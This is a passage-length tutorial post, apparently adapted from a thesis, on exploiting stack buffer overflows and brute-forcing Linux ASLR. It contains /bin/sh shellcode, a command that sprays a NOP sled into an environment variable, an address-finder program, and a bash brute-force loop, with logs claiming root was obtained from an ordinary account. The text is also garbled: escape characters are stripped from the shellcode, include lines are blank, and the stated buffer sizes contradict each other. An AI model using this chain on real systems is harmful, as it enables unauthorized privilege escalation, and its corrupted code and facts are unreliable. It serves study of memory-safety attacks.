BUffer overflow and ASLR bypass (Brute force method)

  • ###### COMMENTS ###########################
    # I wrote this originally a year or so ago                                #
    # and there is a good chance of finding few                            #
    # mistakes as I was in a bit hurry and image                          #
    # copy and paste onto the online pastebin might                     #
    # not have gone quite well. Any comments are welcome.         #
    # I tried do my best to give credits whenever they were due    #
    # regards, 3ntr0py                                                                #
     _                 _                                                                      #
     _) ._ _|_  ._ /  ._                                                                 #
     _) | |  |_  |  _/ |_) /                                                            #
                            |    /                                                             #
    #########################################
    
    
    Exploit writing and ASLR bypass (brute force method)
    
    What is the Exploit?
    
    An exploit is the small-medium-large, simple to complex malicious codes that takes advantage of the vulnerability of the computing devices and takes over control of the target, making the target to execute malicious codes [41]. The main aim of the exploits are usually to escalate the user privileges to gain root access to the system, implant backdoor for later entrance, or execute any other types of codes not designed by the vendor of the software, executing arbitrary codes, Denial of Service or unauthorized data access. There are exploits those are held in private by the Black Hat Hacker and not reported to the vendors of the service and these exploits are referred to as 'zero day exploit'. Unfortunately these exploits can be used to make agents, or zombies to launch an attack to the target while the original black hat hacker stay invincible. This is also called 'Pivoting'. 
    
    Execution from CPU point of view
    
    All the application must able to use the part of the memory to store and manipulate the data. When the applications is started in Windows 32 bit environment, a PEB (Process Execution Block) and TEB(Thread Environment Blick) is created [15], [32]. PEB contains the data like location of main executable, pointer to loader data and pointer to heap information. TEB usually describes the state of the thread process like location of PEB, Location of the stack for the thread it belongs to and the pointer to the SEH (Structured Exception Handling) chain. 
    There are as mentioned earlier, three major segment components: code segment, data segment and stack segment, that starts from the bottom address of the virtual memory allocated for the application and ESP register of the CPU is used mainly to access the stack segment of the program. Majority of the program will have to make subroutine call or calling other function, but in the machine level to make the call back to the previous state, the stack frame is created with the right parameters to the calling function, return address and current state of the ESP register and arguments to the function [15]. So when the function is called a new subroutine stack is created that contains the EBP, EIP and arguments to the function see Fig – 10
    
    
    [Figure – 10 ]
    0x00000007 (bluh)
    ESP top of the stack
    Strcpy() writes here downwards AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAn
    EBP – frame pointer, saved EBP
    Saved EIP
    Pointer to argv[1]
    0xffffffff 
    
    Source code is about as follows 
    [code] 
    
    #include 
    #include 
    
    int main(int argc, char ** argv) {
    
            char string_buffer[250];
    
            strcpy(string_buffer, argv[1]);
            printf("%s n", string_buffer);
            return 0;
    
    }
    [/code]
    
    As we can see and know that the stack grows downwards and if we supply the data that is more than allocated space, we are going to overwrite the EBP, EIP and so on. That means our going to overwrite our return address with random values see Figure - 11. 
    
    [Figure – 1 1]
    0x00000007 (bluh)
    ESP top of the stack
    Strcpy() writes here downwards AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA …...AAA
    EBP – frame pointer, saved EBP AAA
    Saved EIP AAA
    Pointer to argv[1] AAA
    0xffffffff 
    So, in theory if we can overwrite those return address and EIP with random value, then with calculated overflow we can overwrite those CPU registers with different address of the stack and in essence we are controlling EIP and changing flow of execution.  With about 260+ data we will be able to overwrite the EIP with AAAA and instead of writing multiple “A” we can put our address where malicious program resides.
    At this stage we are in control of our program's EIP register, now if need to find a place where we can store our malicious machine code. We can input into our victim software junk data + Location we Provide(EIP) + Malicious Machine Code. So, our machine code will be stored in the buffer as an data in the memory cell idle and if can get its start location, and supply that address as our EIP pointer we effectively will make the software execute our machine code and the stack in its simplistic form looks as follows.  
    
    Buffer + EBP + EIP (address of shellcode) + ESP (where shellcode is). 
    
    Automatic Machine Code Design using Metasploit
    We have seen earlier in the chapter how to create and retrieve the machine code of the compiled program. That is really cumbersome and tedious process, but useful skills for crafting a custom codes. But there is an easier way of getting the machine codes of the programs using the metasploit's msfpayload command. We are able to create the machine code with parameters and specific to Operating Systems. 
    
    Software analyses and exploitation process from CPU level
    
    In this section I will introduce the reader into operation of the compiled program from the hardware level, as it is necessary to understand the concept of the research topic and to assist the reader to understand the concept of operation of protection mechanism from low computing level [15], [49]. I won't be revisiting the programming in Assembly language as it was mentioned earlier and the concept of registers much in details, but when it is crucial to mention I will do so. Just to remember that any given program must be compiled according to CPU specifics. We will take a simple program and analyze its structure from CPU level SC-14. This program will be sufficient enough to demonstrate operation of hardware and compilation for other applications. 
    Our demo program is written in following Linux flavor: "Linux owasp-wte 2.6.35-25-generic #44-Ubuntu SMP Fri Jan 21 17:40:48 UTC 2011 i686 GNU/Linux "
    [code] 
    
    #include 
    #include 
    
    int main(int argc, char ** argv) {
    
            char string_buffer[25];
    
            strcpy(string_buffer, argv[1]);
            printf("%s n", string_buffer);
            return 0;
    
    }
    [/code]
    Source Code 1 -  Sample Small Program
    Compilation is shown below, fig 14
    
    [image] http://i45.tinypic.com/s1jiwg.png [/image]
    
    Figure 1- Code Compilation 
    
    Our simple program will take an argument from the user and stores the values in the variable memory which is 25 bytes long and prints out the result back to the user. We are using "io" and "string" headers from the "/usr/include/stdio.h" library to manipulate the string and input/output. Test execution is show below in fig -15
    
    [image] http://i45.tinypic.com/2wggi80.png [/image]
    
    Figure 2- Test Execution 
    Let's have a look at the compiled program's binary which is ready to be executed, see fig-16. Notice that the binary is represented in hexadecimal to clearer understanding and we are using objdump tool of linux to show the binary.
    [image] http://i49.tinypic.com/aakn7o.png  [/image]
    Figure 3- Intel Binary shown with objdump
    You can see from the command line in the fig shown above, I am using “objdump” tool with Intel Syntax and Global Regular Expression to give me only first 30 lines of hex values, otherwise it would overwhelm out screen with unnecessary codes. In the fig that represents our code, far left hex values are the memory locations where the instructions stored for current operation, as we know the instruction must be stored temporarily for the CPU to execute or read data from. The 32 bit architecture can have up to 2^32 possible addresses or 4,294,967,296 addresses while 64 bit architecture can hold up to 2^64 address spaces [50]. The Hex values in the middle section are the hex representation of the machine instructions. These machine instructions could be represented in binary, but that would be very challenging to analyze the code, that is why they are shown in hex. If you remember at the beginning chapter I did briefly explained how to write an assembly code and how they are segmented. Here in the output above far left, the assembly code instruction of the machine instructions represented in the middle. These assembly code representations will make reading of machine codes much easier. Let's have a look inside out compiled program and the state of the processor registers before they are executed, notice the breakpoint is set at the main function, Figure -17.
    [image] http://i50.tinypic.com/23wmj2a.png [/image]
    Figure 4- Break point in Main
    
    All the registers we mentioned in the beginning of the research are playing a huge part to understanding the code. We can see general purpose registers, stack pointer and EFLAGS registers. Our EIP registers is pointing appropriately to our break point where the execution halts and EIP register stop at 0x8048447 as also shown in the break point output. Disassembled code is shown below in figure 18
    [image] http://i49.tinypic.com/acadqb.png [/image]
    Figure 5- EIP Disassembly 
    
    First two lines of instructions are ones to set up the stack and it is called function prologue and at the end of last two instructions are called function epilogue [15]. I won't go any further, as they are outside the scope of the research and has no relevance. We can see the thirst instruction is to zero out the ESP register, and create x40 hex size space for the variables. Usually memory is allocated in the multiple of 4 bytes, so if we create 22 bytes, the machine gives at least 24 bytes of memory chunk to keep the stack alligned. We will not be going in depth into the assembly instruction, to keep the section short and it is outside the scope of research. Few most important instruction/function location to notice is 0x08048474 <+48>:	call   0x8048358  which calls the functions to take out input and move the data we supply into address 0x08048479 <+53>:	mov    eax,0x8048570, it is copying our data into the space address starting at 0x8048570 and storing that address in the EAX register for faster access, next our EAX register is pointed by ESP stack pointer and next instruction is the print instruction 0x08048489 <+69>:	call   0x8048368 , which executes our given data string. 
    Before that we can see that the ESP register is pointed at ESP+0x23 bytes up, that is where our data starts, we can take a look at the register at this stage now. Fig – 19
    [image] http://i47.tinypic.com/3023yup.png [/image]
    
    [image] http://i45.tinypic.com/1zxr701.png [/image]
    
    Figure 6- Stack Examination 
    And fig - 20
    [image] http://i45.tinypic.com/24q2vqe.png [/image]
    Figure 7- Hex representation 
    
    After the function is executed the EAX register is cleared by giving it 0 value, and before the function epilogue the security measures are checked using the PaX/stack cookies security mechanism to prevent the buffer overflow attack at  0x080484a0 <+92> [51]:	call   0x8048378 <__stack_chk_fail@plt>.
    So having a look at the program execution process, we can move on to our first exploitation process from low level in the next section. The full code with bold section is given appendix b.3. 
    Following scenario can be found at TFTP and Remote login terminal where users can login anonymously or as an ordinary user to execute least privileged applications and exploiting the vulnerable software to escalate and get control of the remote machine. Now that we now how the program operates and what functions get called we can take a look at how to exploit the software by subverting the Stack Pointer and execute the arbitrary code from the current process. From the program above we know that the our buffer is 300 bytes long, if we supply more than 300 bytes of data it is going to be overflown, but it takes more data to overflow the EIP register. The reason this overflow occurs is because the application above doesn’t check the user supplied data, in essence there is not boundary control of data input. So simply, [300 bytes chars] + [ret/EBP] is our stack, if we give 300+ bytes it is going to overwrite the ret/EBP address. We can see the vunlnerable function from the gdb output. When we supply 304 bytes of chars “x41” (that is ‘A’ in ASCII table), the stack is overflown and plus 4 more bytes will be our return address. The stack can be seen from the gdb output, “BBBB” is the place holder for our return address. See fig - 21. 
    
    [image] http://i45.tinypic.com/24q2vqe.png [/image]
    Figure 8- Stack overflow 
    In order to accomplish the exploitation we must overwrite the first 40% of the stack with "x90" (NOP) instruction which is the CPU code for nothing to be executed and slide down the memory cell, next we must inject our malicious code and last we supply our return address that would restart the process from the beginning, executing malicious code, The return address should be somewhere in the middle of our NOP operation where nothing gets executed, but giving control to the attacker more chances to catch the crafted malicious code. The return address is found using the debugger and chosen at "0xbffff174" we see it in the gdb output where the Stack Pointer is depicted figure -22.
    [image] http://i45.tinypic.com/24q2vqe.png [/image]
    Figure 9- Stack Exploit 
    
    We can supply that address as a return address to the program multiple times. The illustration of the process can be seen from figure -23. 
    
    [image] http://i46.tinypic.com/28at3wi.png [/image]
    Figure 10- Exploited Stack Diagram [23]
    Our final exploit code looks like this: [NOP]+[malicious code]+[return address]. The actual codes is as follows and shown in the terminal. At the end of the GDB output we can see that new process has started from inside the current one, process number 9310.
    
    ASLR Brute Force attack Implementation 
    As mentioned earlier in the introduction section, ASLR will randomize the key segments of the program, which would prevent majority of the buffer overflow attacks that relies on the static memory address [18]. I will try not to point out details mentioned earlier. For ASLR to able to randomize the space, it needs to have the pool of addresses that it can make use of for storing data in the reserved area. That is why ASLR is more secure when the entropy (entropy is the measure of unpredictability) probability is high [52]. Entropy is usually defined by the theory of randomization from given set of numbers ranges. Entropy is increased when more virtual memory is allocated to be used. 
    We can try to understand the ASLR code from the following snippet of the Linux randomization code used by the OS which can be found at fs/binfmt_elf.c and snippet of the code is shown in appendix B.4
    From above snipped of the code, we can see that entropy is generated using the gat_random_int() function, which in turn looks as shown in Appendix B.5:
    The comments above of the program is self explanatory how the function works, it is taken from IP random number generator. We can verify the randomization of the stack by looking at the “vftable” of the program and see the changes in the memory locations and also storing the environmental variable in the stack and printing out its location. 
    There have been many techniques developed to bypass the ASLR security process and one of them is by mean of brute forcing the entropy pool, which involves a lot of guessing to find the correct location of data or variable that can be used to inject malicious code. Before brute forcing, the attacker is able to occupy majority of available pool of ASLR with "NOP" sleds of the machines code that result in reducing the entropy pool [29], [30]. This will effectively reduce the guess/ brute forcing attempts. We can have a look at briefly the formula of ASLR attack by brute force and define some variables that used to represent the OS functions [18]. 
    Es = entropy bits of stack top
    Em = entropy bits of mmap() base
    Ex = entropy bits of heap
    As = attacked bits per attempt of stack entropy
    Am = attacked bits per attempt of mmap() base 
    Ax = attacked bits per attaempt of main executables entropy
    Ah = attacked bits per attempts of heap base entropy
    a^ = attempts made
    N = Es - As + Em - Am + Ex-Ax+Eh – Ah
    [source: wikipedia] 
    
    
    
    Implementation and Demonstration
    In our scenario to make our case a bit more difficult the target program is more secure by accepting the small buffers, hence the attacker is not able to store his own malicious code in the same stack. Our program will take only ten bytes of data, and prints out the result in the screen. 
    The stack is randomized, that is why ordinary exploitation techniques will not work here. As our target buffer is small we will store our malicious code in the OS environmental variables and retrieve its location by mean of Brute forces and use that location as the return address for our victim software. From above explained, in order to brute force the ASLR we need to occupy most of its place to reduce the entropy pool. I will feed the entropy pool with over 10 megabytes of "NOP" instruction and the approximate location of the OS Environment stored machine code, hoping when the brute force occurs my malicious code will be stored in the reduced entropy address and its is used as a return address for a victim process. I have also written small program to find the approximate location of the OS stored variable that can give the attacker starting point. The code uses the C programming language's getenv() function to retrieve the environmental variable location. ASLR is not secure on its own that is why other means are considered while implementing it, which I will cover in the conclusion part. 
    
    
    
    ############ start of the source code #####
    
    #include 
    #include 
    
    int main(int argc, char** argv)
    
    {
            char buff[10];
            strcpy(buff, argv[1]);
            return 0;
    
    }
    ########## end of source code ############
    
    Below is the machine generated using the assembly to create the executable of '/bin/sh' of linux commands and obtaining the machine code versions. The result is shown below and method is explained earlier.
    ########## machine code #################
    "x31xc0x89xc2x50x68x6ex2fx73x68x68x2fx2fx62x69x89xe3x89xc1xb0x0bx52x51x53x89xe1xcdx80"
    the above machine code is stored as a shellcode.bin
    ############ end ########################
    
    Below is the command line for storing the environmental variable in the stack occupying 10 megabytes for brute forcing and concatenating the machine code.
    ##### Command line for occupying the entropy stack ###
    export SC=$(perl -e 'print "x90" x 10000')$(cat shellcode.bin)
    ###############
    
    Below is the small program that I wrote that aids me to finding the environmental variable. As you notice I am obtaining the approximate difference between two programs, and obtaining possible location when that program is executed. 
    
    ######### Env. Variable retrieval code ##
    #include 
    #include 
    #include 
    
    int main(int argc, char **argv)
    {
            char *ptr;
    
            if(argc < 3)
            {
                    printf("Usage %s  n", argv[0]);
                    return 1;
            }
    
            ptr = getenv(argv[1]); // get the address of the env variable
            ptr += strlen(argv[0]) - strlen(argv[2]); //adjust for difference in names
            printf("%s @: %pn", argv[1], ptr);
            return 0;
    
    }
    ############# end of code ############################
    
    ############ kernel version##########
    Linux bt 2.6.39.4 #1 SMP Thu Aug 18 13:38:02 NZST 2011 i686 GNU/Linux
    ####################################
    
    Below is the result of the location obtained with above method
    
    ###### obtained Shellcode/ machine code starting location #########
    0xbf84c6fa
    #################
    [image] http://i46.tinypic.com/70cpll.png [image]
    
    Below is the attack code that automates the brute force using the occupied stack, and the obtained possible location of the machine code stored in the stack.
    
    ###### attack code #################
    for i in {1..2500}; do echo number of tries: $i && ./vuln6 `python -c 'print "x90"*14 + "x65x27xb5xbf"'` && break; echo Exploit failed; sleep .01; clear;done;
    ###### attack code finish ##########
    
    [image] http://i45.tinypic.com/x20xom.png [/image]
    
    ########### attacking as an ordinary user called 3ntr0py to gain root privileges via executing malicious code ##########
    profile is as follows: 
    sh-4.1$ id
    uid=1001(3ntr0py) gid=1001(3ntr0py) groups=1001(3ntr0py)
    ###########
    
    After brute forcing we can see that we managed attack the ASLR in 144 attempts and obtain root privileges in the target machine. 
    From the screen shot snipped, we can see that the effective user is root.
    
    [image] http://i45.tinypic.com/50jiia.png [/image]
    For analyses 10 more brute forces have been conducted and the table is provided below for statistics. 
    
    Table 5.1 - Brute force attack statistics 
    No of Attempts              Brute Force attempts
    1---------------------------->999
    2---------------------------->144
    3---------------------------->1224
    4----------------------------->21
    5------------------------------>159
    6--------------------------------->216
    7------------------------------------>13
    8--------------------------------->320
    9------------------------------------>2364
    10---------------------------------->262
    Average attempts----------------->572.2
    
    
    [image] http://i49.tinypic.com/2rpv8s2.png [/image]
    
    References:
    1]	 An Zhiyuan and Liu Haiyan, ‘Realization of Buffer Overflow’, in 2010 International Forum on Information Technology and Applications (IFITA), 2010, vol. 1, pp. 347–349.
    [2]	 Z. Liang, B. Liang, L. Li, W. Chen, Q. Kang, and Y. Gu, ‘Against Code Injection with System Call Randomization’, in Networks Security, Wireless Communications and Trusted Computing, 2009. NSWCTC  ’09. International Conference on, 2009, vol. 1, pp. 584 –587.
    [3]	‘Buffer overflow - Wikipedia, the free encyclopedia’. [Online]. Available: http://en.wikipedia.org/wiki/Buffer_overflow. [Accessed: 28-Feb-2012].
    
    [7]	 C. Kil, J. Jun, C. Bookholt, J. Xu, and P. Ning, ‘Address Space Layout Permutation (ASLP): Towards Fine-Grained Randomization of Commodity Software’, in Computer Security Applications Conference, 2006. ACSAC  ’06. 22nd Annual, 2006, pp. 339 –348.
    [8]	 B. Smith, W. Yurcik, and D. Doss, ‘Ethical hacking: the security justification redux’, in Technology and Society, 2002. (ISTAS’02). 2002 International Symposium on, 2002, pp. 374 – 379.
    [9]	 C. C. Palmer, ‘Ethical hacking’, IBM Systems Journal, vol. 40, no. 3, pp. 769 –780, 2001.
    
    [11]	 K. Piromsopa and R. J. Enbody, ‘Arbitrary Copy: Bypassing Buffer-Overflow Protections’, in 2006 IEEE International Conference on Electro/information Technology, 2006, pp. 580–584.
    [12]	 V. Iyer, A. Kanitkar, P. Dasgupta, and R. Srinivasan, ‘Preventing Overflow Attacks by Memory Randomization’, in Software Reliability Engineering (ISSRE), 2010 IEEE 21st International Symposium on, 2010, pp. 339 –347.
    [13]	‘SANS: CWE/SANS TOP 25 Most Dangerous Software Errors’. [Online]. Available: http://www.sans.org/top25-software-errors/. [Accessed: 07-Jun-2012].
    
    [15]	‘Intel® 64 and IA-32 Architectures Developer’s Manual: Vol 1’. [Online]. Available: http://www.intel.com/content/www/us/en/architecture-and-technology/64-ia-32-architectures-software-developer-vol-1-manual.html. [Accessed: 28-Feb-2012].
    [16]	‘Code injection - Wikipedia, the free encyclopedia’. [Online]. Available: http://en.wikipedia.org/wiki/Code_injection. [Accessed: 28-Feb-2012].
    [
    [18]	 Wikipedia contributors, ‘Address space layout randomization’, Wikipedia, the free encyclopedia. Wikimedia Foundation, Inc., 04-Jun-2012.
    
    [20]	‘Central processing unit - Wikipedia, the free encyclopedia’. [Online]. Available: http://en.wikipedia.org/wiki/Central_processing_unit. [Accessed: 28-Feb-2012].
    [21]	 K. Piromsopa and R. J. Enbody, ‘Buffer-Overflow Protection: The Theory’, in 2006 IEEE International Conference on Electro/information Technology, 2006, pp. 454–458.
    [22]	 C. Cowan, F. Wagle, Calton Pu, S. Beattie, and J. Walpole, ‘Buffer overflows: attacks and defenses for the vulnerability of the decade’, in DARPA Information Survivability Conference and Exposition, 2000. DISCEX  ’00. Proceedings, 2000, vol. 2, pp. 119–129 vol.2.
    [23]	 A. Kundu and E. Bertino, ‘A New Class of Buffer Overflow Attacks’, in 2011 31st International Conference on Distributed Computing Systems (ICDCS), 2011, pp. 730–739.
    [24]	 M. Rinard, C. Cadar, D. Dumitran, D. M. Roy, and T. Leu, ‘A dynamic technique for eliminating buffer overflow vulnerabilities (and other memory errors)’, in Computer Security Applications Conference, 2004. 20th Annual, 2004, pp. 82– 90.
    [25]	 Shunli Ding and Jingbo Yuan, ‘Identifying buffer overflow vulnerabilities based on binary code’, in 2011 IEEE International Conference on Computer Science and Automation Engineering (CSAE), 2011, vol. 4, pp. 738–742.
    
    
    [29]	‘Return of the sprayer - exploits to beat DEP and ASLR - The H Security: News and Features’. [Online]. Available: http://www.h-online.com/security/features/Return-of-the-sprayer-exploits-to-beat-DEP-and-ASLR-1171463.html. [Accessed: 25-Jun-2012].
    [30]	‘SophSec Intrusion Labs - Attacks on Linux 2.6 Kernels ASLR, x86’. [Online]. Available: http://www.sophsec.com/research/aslr_research.html. [Accessed: 27-Jul-2012].
    [33]	 A. Francillon and C. Castelluccia, ‘Code injection attacks on harvard-architecture devices’, in Proceedings of the 15th ACM conference on Computer and communications security, New York, NY, USA, 2008, pp. 15–26.
    [34]	‘12th USENIX Security Symposium — Technical Paper’. [Online]. Available: http://static.usenix.org/events/sec03/tech/full_papers/cowan/cowan_html/index.html. [Accessed: 08-Aug-2012].
    [35]	‘Stack Shield’. [Online]. Available: http://www.angelfire.com/sk/stackshield/. [Accessed: 08-Aug-2012].[52]	 Wikipedia contributors, ‘Entropy (information theory)’, Wikipedia, the free encyclopedia. Wikimedia Foundation, Inc., 26-Jul-2012.